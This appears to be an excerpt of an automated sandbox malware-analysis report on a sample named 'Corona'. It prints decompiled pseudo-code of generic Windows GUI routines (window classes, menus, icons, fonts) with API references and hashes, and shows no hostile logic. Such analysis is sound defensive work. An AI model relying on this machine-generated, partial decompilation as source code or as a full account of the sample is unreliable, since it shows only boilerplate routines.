                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB1F
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID: H E
                                  • API String ID: 2103932818-318411991
                                  • Opcode ID: 9c0873b56c7be81a9825c4451f89ff5bc89dba3bc69784d9130987f594d0f79e
                                  • Instruction ID: 7e16a99a90c099530224821c8cc62cb92c3b61364135999837b0ee578208fda6
                                  • Opcode Fuzzy Hash: 9c0873b56c7be81a9825c4451f89ff5bc89dba3bc69784d9130987f594d0f79e
                                  • Instruction Fuzzy Hash: 2A414F74641340AFE751EB69DCC2F6637A8AB45708F14457AF901EB2E3DAB9E800876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E00431EAC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                  				char _v68;
                                  				struct _WNDCLASSA _v108;
                                  				intOrPtr _v116;
                                  				signed char _v137;
                                  				void* _v144;
                                  				struct _WNDCLASSA _v184;
                                  				char _v188;
                                  				char _v192;
                                  				char _v196;
                                  				int _t52;
                                  				void* _t53;
                                  				void* _t67;
                                  				intOrPtr _t86;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				void* _t109;
                                  				intOrPtr* _t111;
                                  				void* _t115;
                                  
                                  				_t109 = __edi;
                                  				_t94 = __ebx;
                                  				_push(__ebx);
                                  				_v196 = 0;
                                  				_t111 = __eax;
                                  				_push(_t115);
                                  				_push(0x43206d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t115 + 0xffffff40;
                                  				_t95 =  *__eax;
                                  				 *((intOrPtr*)( *__eax + 0x98))();
                                  				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                  					L7:
                                  					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                  					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                  					asm("sbb eax, eax");
                                  					_t53 = _t52 + 1;
                                  					if(_t53 == 0 || E0042B5E8 != _v184.lpfnWndProc) {
                                  						if(_t53 != 0) {
                                  							UnregisterClassA( &_v68, _v108.hInstance);
                                  						}
                                  						_v108.lpfnWndProc = E0042B5E8;
                                  						_v108.lpszClassName =  &_v68;
                                  						if(RegisterClassA( &_v108) == 0) {
                                  							E0040C5C8(_t94, _t95, _t109, _t111);
                                  						}
                                  					}
                                  					 *0x4509d4 = _t111;
                                  					_t96 =  *_t111; // executed
                                  					 *((intOrPtr*)( *_t111 + 0x9c))();
                                  					if( *(_t111 + 0x180) == 0) {
                                  						E0040C5C8(_t94, _t96, _t109, _t111);
                                  					}
                                  					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                  						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                  					}
                                  					E004084A8( *((intOrPtr*)(_t111 + 0x64)));
                                  					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                  					E00435160(_t111);
                                  					_t67 = E0041C440( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96); // executed
                                  					E0042F98C(_t111, _t67, 0x30, 1);
                                  					_t130 =  *((char*)(_t111 + 0x5c));
                                  					if( *((char*)(_t111 + 0x5c)) != 0) {
                                  						E004032F8(_t111, _t130);
                                  					}
                                  					_pop(_t104);
                                  					 *[fs:eax] = _t104;
                                  					_push(0x432074);
                                  					return E00403E4C( &_v196);
                                  				} else {
                                  					_t94 =  *((intOrPtr*)(__eax + 4));
                                  					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                  						L6:
                                  						_v192 =  *((intOrPtr*)(_t111 + 8));
                                  						_v188 = 0xb;
                                  						_t86 =  *0x451004; // 0x41a47c
                                  						E0040597C(_t86,  &_v196);
                                  						_t95 = _v196;
                                  						E0040B1F4(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                  						E00403888();
                                  					} else {
                                  						_t108 =  *0x42abf0; // 0x42ac3c
                                  						if(E00403288(_t94, _t108) == 0) {
                                  							goto L6;
                                  						}
                                  						_v116 = E00434EF4(_t94);
                                  					}
                                  					goto L7;
                                  				}
                                  			}






















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  • API String ID: 717780171-2766056989
                                  • Opcode ID: e363a83fe742b6d0208d1c73613e69ac5f4bd8b3060d6cd5570c2bfc466fe7ca
                                  • Instruction ID: 2696768af14e9da2e08b9c4245764d4c66f34b8d60f6e5989b72d2a42a9c3d82
                                  • Opcode Fuzzy Hash: e363a83fe742b6d0208d1c73613e69ac5f4bd8b3060d6cd5570c2bfc466fe7ca
                                  • Instruction Fuzzy Hash: 415180716003589BDB20DB69CC81B9EB7F9AF08308F50457EF859E72A1DB38AD44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E0044C6A8(void* __ecx, char __edx) {
                                  				char _v5;
                                  				char _v261;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				intOrPtr _t39;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				struct HINSTANCE__** _t53;
                                  				struct HICON__* _t55;
                                  				intOrPtr _t58;
                                  				struct HINSTANCE__** _t60;
                                  				void* _t67;
                                  				char* _t69;
                                  				char* _t75;
                                  				intOrPtr _t81;
                                  				intOrPtr* _t88;
                                  				intOrPtr* _t89;
                                  				intOrPtr _t90;
                                  				void* _t91;
                                  				char _t93;
                                  				void* _t104;
                                  				void* _t105;
                                  
                                  				_t93 = __edx;
                                  				_t91 = __ecx;
                                  				if(__edx != 0) {
                                  					_t105 = _t105 + 0xfffffff0;
                                  					_t39 = E00403420(_t39, _t104);
                                  				}
                                  				_v5 = _t93;
                                  				_t90 = _t39;
                                  				E00419098(_t91, 0);
                                  				_t42 =  *0x450f38; // 0x4503c4
                                  				if( *((short*)(_t42 + 2)) == 0) {
                                  					_t89 =  *0x450f38; // 0x4503c4
                                  					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                  					 *_t89 = 0x44dd80;
                                  				}
                                  				_t43 =  *0x450fe4; // 0x4503cc
                                  				if( *((short*)(_t43 + 2)) == 0) {
                                  					_t88 =  *0x450fe4; // 0x4503cc
                                  					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                  					 *_t88 = E0044DF78;
                                  				}
                                  				 *((char*)(_t90 + 0x34)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x90)) = E004030CC(1);
                                  				 *((intOrPtr*)(_t90 + 0xa8)) = E004030CC(1);
                                  				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                  				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                  				 *((char*)(_t90 + 0x7c)) = 1;
                                  				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                  				 *((char*)(_t90 + 0x88)) = 0;
                                  				 *((char*)(_t90 + 0x9d)) = 1;
                                  				 *((char*)(_t90 + 0xb4)) = 1;
                                  				_t103 = E00422924(1);
                                  				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                  				_t53 =  *0x450e60; // 0x45202c
                                  				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                  				E00422CF4(_t103, _t55);
                                  				_t20 = _t90 + 0x98; // 0x736d
                                  				_t58 =  *_t20;
                                  				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                  				 *((intOrPtr*)(_t58 + 0x10)) = 0x44e518;
                                  				_t60 =  *0x450e60; // 0x45202c
                                  				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                  				OemToCharA( &_v261,  &_v261);
                                  				_t67 = E0040BF80(0x5c);
                                  				if(_t67 != 0) {
                                  					_t27 = _t67 + 1; // 0x1
                                  					E004082AC( &_v261, _t27);
                                  				}
                                  				_t69 = E0040BFA8( &_v261, 0x2e);
                                  				if(_t69 != 0) {
                                  					 *_t69 = 0;
                                  				}
                                  				CharLowerA( &(( &_v261)[1]));
                                  				_t31 = _t90 + 0x8c; // 0x444b24
                                  				E004040BC(_t31, 0x100,  &_v261);
                                  				_t75 =  *0x450d58; // 0x452034
                                  				if( *_t75 == 0) {
                                  					E0044C9B0(_t90, _t90, 0x100); // executed
                                  				}
                                  				 *((char*)(_t90 + 0x59)) = 1;
                                  				 *((char*)(_t90 + 0x5a)) = 1;
                                  				 *((char*)(_t90 + 0x5b)) = 1;
                                  				 *((char*)(_t90 + 0x9e)) = 1;
                                  				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                  				E0044E6F4(_t90, 0x100);
                                  				E0044F0B8(_t90);
                                  				_t81 = _t90;
                                  				if(_v5 != 0) {
                                  					E00403478(_t81);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t90;
                                  			}


























                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0044C78D
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C7BF
                                  • OemToCharA.USER32(?,?), ref: 0044C7D2
                                  • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C812
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Char$FileIconLoadLowerModuleName
                                  • String ID: , E$4 E$MAINICON
                                  • API String ID: 3935243913-3115775848
                                  • Opcode ID: 2e7641ec6f783780665d8e810a51c97b635d9958c5ef7161830123da460a768d
                                  • Instruction ID: 6ee070d7603dc0e8e4ded7314cca8777ca8a6862e1012d6af4779427f1637a19
                                  • Opcode Fuzzy Hash: 2e7641ec6f783780665d8e810a51c97b635d9958c5ef7161830123da460a768d
                                  • Instruction Fuzzy Hash: A45160706042449FE751EF39D8C5B853BE4AB15308F4440BAE848DF397D7BAD948CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 89%
                                  			E0044BDA0(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                  				char _v5;
                                  				struct tagLOGFONTA _v65;
                                  				struct tagLOGFONTA _v185;
                                  				struct tagLOGFONTA _v245;
                                  				void _v405;
                                  				void* _t23;
                                  				int _t27;
                                  				void* _t30;
                                  				intOrPtr _t38;
                                  				struct HFONT__* _t41;
                                  				struct HFONT__* _t45;
                                  				struct HFONT__* _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				void* _t57;
                                  				void* _t72;
                                  				void* _t74;
                                  				void* _t75;
                                  				intOrPtr _t76;
                                  
                                  				_t72 = __edi;
                                  				_t74 = _t75;
                                  				_t76 = _t75 + 0xfffffe6c;
                                  				_t57 = __eax;
                                  				_v5 = 0;
                                  				if( *0x452bb0 != 0) {
                                  					_t54 =  *0x452bb0; // 0x2131714
                                  					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                  				}
                                  				_push(_t74);
                                  				_push(0x44bee5);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				if( *0x452bb0 != 0) {
                                  					_t52 =  *0x452bb0; // 0x2131714
                                  					E0044E290(_t52, 0);
                                  				}
                                  				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                  					_t23 = GetStockObject(0xd);
                                  					_t7 = _t57 + 0x84; // 0x38004010
                                  					E0041C5E8( *_t7, _t23, _t72);
                                  				} else {
                                  					_t49 = CreateFontIndirectA( &_v65); // executed
                                  					_t6 = _t57 + 0x84; // 0x38004010
                                  					E0041C5E8( *_t6, _t49, _t72);
                                  				}
                                  				_v405 = 0x154;
                                  				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                  				if(_t27 == 0) {
                                  					_t14 = _t57 + 0x80; // 0x94000000
                                  					E0041C6CC( *_t14, 8);
                                  					_t30 = GetStockObject(0xd);
                                  					_t15 = _t57 + 0x88; // 0x90000000
                                  					E0041C5E8( *_t15, _t30, _t72);
                                  				} else {
                                  					_t41 = CreateFontIndirectA( &_v185);
                                  					_t11 = _t57 + 0x80; // 0x94000000
                                  					E0041C5E8( *_t11, _t41, _t72);
                                  					_t45 = CreateFontIndirectA( &_v245);
                                  					_t13 = _t57 + 0x88; // 0x90000000
                                  					E0041C5E8( *_t13, _t45, _t72);
                                  				}
                                  				_t16 = _t57 + 0x80; // 0x94000000
                                  				E0041C42C( *_t16, 0xff000017);
                                  				_t17 = _t57 + 0x88; // 0x90000000
                                  				E0041C42C( *_t17, 0xff000007);
                                  				 *[fs:eax] = 0xff000007;
                                  				_push(0x44beec);
                                  				if( *0x452bb0 != 0) {
                                  					_t38 =  *0x452bb0; // 0x2131714
                                  					return E0044E290(_t38, _v5);
                                  				}
                                  				return 0;
                                  			}























                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0044BDF4
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE01
                                  • GetStockObject.GDI32(0000000D), ref: 0044BE17
                                    • Part of subcall function 0041C6CC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C6D9
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0044BE40
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE50
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE69
                                  • GetStockObject.GDI32(0000000D), ref: 0044BE8F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 406b453e2eb96f88e208c54938b37e875b627c301bb8c47082f7830c41cc4f16
                                  • Instruction ID: 13048d095b05e568d88b2462bdf880b39143dba53368d4fab1f71bf1c901f1df
                                  • Opcode Fuzzy Hash: 406b453e2eb96f88e208c54938b37e875b627c301bb8c47082f7830c41cc4f16
                                  • Instruction Fuzzy Hash: 4F31A3307442449BFB50EB69CC82BDA73E9EB45304F5044B7BA08DB297DB78E844C729
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 526 446ae8-446b41 call 4317f8 call 430f54 530 446b46-446b50 526->530 531 446b56-446b60 530->531 532 446cb2-446cbd 530->532 531->532 533 446b66-446b70 531->533 534 446cbf-446cc4 call 42e210 532->534 535 446cc9-446cd4 532->535 536 446bb5-446bdb call 446e70 533->536 537 446b72-446b84 533->537 534->535 539 446cd6-446cdb call 42e254 535->539 540 446ce0-446cf1 535->540 536->532 553 446be1-446c0c call 446148 call 4349b8 536->553 537->536 541 446b86-446bb0 call 41c60c MulDiv call 41c614 537->541 539->540 544 446d17-446d3d call 42f98c call 431800 540->544 545 446cf3-446d12 call 446148 call 4349b8 540->545 541->536 545->544 562 446c31-446c3b 553->562 563 446c0e-446c2b MulDiv 553->563 564 446c60-446c6a 562->564 565 446c3d-446c5a MulDiv 562->565 563->562 564->532 566 446c6c-446cac MulDiv * 2 564->566 565->564 566->532
                                  C-Code - Quality: 89%
                                  			E00446AE8(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				signed char _t92;
                                  				int _t98;
                                  				int _t100;
                                  				intOrPtr _t117;
                                  				int _t122;
                                  				intOrPtr _t155;
                                  				void* _t164;
                                  				signed char _t180;
                                  				intOrPtr _t182;
                                  				intOrPtr _t194;
                                  				int _t199;
                                  				intOrPtr _t203;
                                  				void* _t204;
                                  
                                  				_t204 = __eflags;
                                  				_t202 = _t203;
                                  				_v8 = __eax;
                                  				E004317F8(_v8);
                                  				_push(_t203);
                                  				_push(0x446d3e);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t203;
                                  				 *(_v8 + 0x268) = 0;
                                  				 *(_v8 + 0x26c) = 0;
                                  				 *(_v8 + 0x270) = 0;
                                  				_t164 = 0;
                                  				_t92 =  *0x452661; // 0x0
                                  				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                                  				E00430F54(_v8, 0, __edx, _t204); // executed
                                  				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                  					L12:
                                  					_t98 =  *(_v8 + 0x268);
                                  					_t213 = _t98;
                                  					if(_t98 > 0) {
                                  						E0042E210(_v8, _t98, _t213);
                                  					}
                                  					_t100 =  *(_v8 + 0x26c);
                                  					_t214 = _t100;
                                  					if(_t100 > 0) {
                                  						E0042E254(_v8, _t100, _t214);
                                  					}
                                  					_t180 =  *0x446d4c; // 0x0
                                  					 *(_v8 + 0x98) = _t180;
                                  					_t215 = _t164;
                                  					if(_t164 == 0) {
                                  						E00446148(_v8, 1, 1);
                                  						E004349B8(_v8, 1, 1, _t215);
                                  					}
                                  					E0042F98C(_v8, 0, 0xb03d, 0);
                                  					_pop(_t182);
                                  					 *[fs:eax] = _t182;
                                  					_push(0x446d45);
                                  					return E00431800(_v8);
                                  				} else {
                                  					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                  						_t194 =  *0x452bb4; // 0x2131320
                                  						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
                                  							_t155 =  *0x452bb4; // 0x2131320
                                  							E0041C614( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041C60C( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
                                  						}
                                  					}
                                  					_t117 =  *0x452bb4; // 0x2131320
                                  					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
                                  					_t199 = E00446E70(_v8);
                                  					_t122 =  *(_v8 + 0x270);
                                  					_t209 = _t199 - _t122;
                                  					if(_t199 != _t122) {
                                  						_t164 = 1;
                                  						E00446148(_v8, _t122, _t199);
                                  						E004349B8(_v8,  *(_v8 + 0x270), _t199, _t209);
                                  						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                  							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                  							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                  							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                                  							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                                  						}
                                  					}
                                  					goto L12;
                                  				}
                                  			}


                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 00446BA7
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C23
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C52
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446C81
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 00446CA4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce8a226be4f6b75357d3f5ebbe0fd27d238075b0d9c4ae4a579e4e3c1a3d593c
                                  • Instruction ID: 6f69ae2b27a25fd325bd435391a4d45563639ab929921a0205d2328f21e47e78
                                  • Opcode Fuzzy Hash: ce8a226be4f6b75357d3f5ebbe0fd27d238075b0d9c4ae4a579e4e3c1a3d593c
                                  • Instruction Fuzzy Hash: A371D574B04104EFDB04DBA9C589EAAB7F5EF49304F2541F6A848EB362C739AE41DB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 567 448040-448062 568 4480d4-4480dc 567->568 569 448064-448071 call 44b870 567->569 571 4480e5-4480e9 568->571 572 4480de-4480e0 call 441b78 568->572 569->568 579 448073-448077 569->579 573 4480f5 571->573 574 4480eb-4480ed 571->574 572->571 577 4480f7-4480ff 573->577 574->577 578 4480ef-4480f3 574->578 580 448101-448105 call 419168 577->580 581 44810a-44810c 577->581 578->573 578->577 582 448079-44808b call 44b85c 579->582 580->581 585 448112-448116 581->585 586 4481bd-4481c6 call 435154 581->586 591 44808d-44809b call 44b85c 582->591 592 4480ce-4480d2 582->592 589 448125-44812f 585->589 590 448118-44811f 585->590 597 4481d7-4481de 586->597 598 4481c8-4481d2 call 434ef4 SetMenu 586->598 594 448131-448138 589->594 595 44813a-44813e 589->595 590->586 590->589 591->592 608 44809d-4480c9 call 40597c call 40b1f4 call 403888 591->608 592->568 592->582 594->595 599 448140-448149 call 435154 594->599 595->599 600 448198-44819f 595->600 603 4481e0-4481e4 call 449104 597->603 604 4481e9-448205 call 447f78 call 403e4c 597->604 598->597 599->597 616 44814f-44816b call 434ef4 GetMenu 599->616 600->597 606 4481a1-4481aa call 435154 600->606 603->604 606->597 618 4481ac-4481bb call 434ef4 SetMenu 606->618 608->592 629 448186-448196 call 434ef4 call 441b78 616->629 630 44816d-448181 call 434ef4 SetMenu 616->630 618->597 629->597 630->629
                                  C-Code - Quality: 89%
                                  			E00448040(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				void* _t41;
                                  				void* _t54;
                                  				void* _t61;
                                  				struct HMENU__* _t64;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t87;
                                  				void* _t92;
                                  				intOrPtr _t98;
                                  				void* _t111;
                                  				intOrPtr _t113;
                                  				void* _t116;
                                  
                                  				_t109 = __edi;
                                  				_push(__edi);
                                  				_v20 = 0;
                                  				_t113 = __edx;
                                  				_t92 = __eax;
                                  				_push(_t116);
                                  				_push(0x448206);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t116 + 0xfffffff0;
                                  				if(__edx == 0) {
                                  					L7:
                                  					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                  					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                  						E00441B78(_t39, 0, _t109, 0);
                                  					}
                                  					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                  						_t113 = 0;
                                  					}
                                  					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                  					if(_t113 != 0) {
                                  						E00419168(_t113, _t92);
                                  					}
                                  					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                  						_t41 = E00435154(_t92);
                                  						__eflags = _t41;
                                  						if(_t41 != 0) {
                                  							SetMenu(E00434EF4(_t92), 0); // executed
                                  						}
                                  						goto L30;
                                  					} else {
                                  						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                  							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                  								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                  								if( *((char*)(_t92 + 0x22f)) != 1) {
                                  									_t54 = E00435154(_t92);
                                  									__eflags = _t54;
                                  									if(_t54 != 0) {
                                  										SetMenu(E00434EF4(_t92), 0);
                                  									}
                                  								}
                                  								goto L30;
                                  							}
                                  							goto L21;
                                  						} else {
                                  							L21:
                                  							if(E00435154(_t92) != 0) {
                                  								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  								_t110 = _t61;
                                  								_t64 = GetMenu(E00434EF4(_t92));
                                  								_t138 = _t61 - _t64;
                                  								if(_t61 != _t64) {
                                  									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                  									SetMenu(E00434EF4(_t92), _t70);
                                  								}
                                  								E00441B78(_t113, E00434EF4(_t92), _t110, _t138);
                                  							}
                                  							L30:
                                  							if( *((char*)(_t92 + 0x22e)) != 0) {
                                  								E00449104(_t92, 1);
                                  							}
                                  							E00447F78(_t92);
                                  							_pop(_t98);
                                  							 *[fs:eax] = _t98;
                                  							_push(0x44820d);
                                  							return E00403E4C( &_v20);
                                  						}
                                  					}
                                  				}
                                  				_t77 =  *0x452bb4; // 0x2131320
                                  				_t79 = E0044B870(_t77) - 1;
                                  				if(_t79 >= 0) {
                                  					_v8 = _t79 + 1;
                                  					_t111 = 0;
                                  					do {
                                  						_t81 =  *0x452bb4; // 0x2131320
                                  						if(_t113 ==  *((intOrPtr*)(E0044B85C(_t81, _t111) + 0x248))) {
                                  							_t83 =  *0x452bb4; // 0x2131320
                                  							if(_t92 != E0044B85C(_t83, _t111)) {
                                  								_v16 =  *((intOrPtr*)(_t113 + 8));
                                  								_v12 = 0xb;
                                  								_t87 =  *0x450e20; // 0x41a65c
                                  								E0040597C(_t87,  &_v20);
                                  								E0040B1F4(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                  								E00403888();
                                  							}
                                  						}
                                  						_t111 = _t111 + 1;
                                  						_t10 =  &_v8;
                                  						 *_t10 = _v8 - 1;
                                  					} while ( *_t10 != 0);
                                  				}
                                  			}


                                  APIs
                                  • GetMenu.USER32(00000000), ref: 00448164
                                  • SetMenu.USER32(00000000,00000000), ref: 00448181
                                  • SetMenu.USER32(00000000,00000000), ref: 004481B6
                                  • SetMenu.USER32(00000000,00000000,00000000,00448206), ref: 004481D2
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
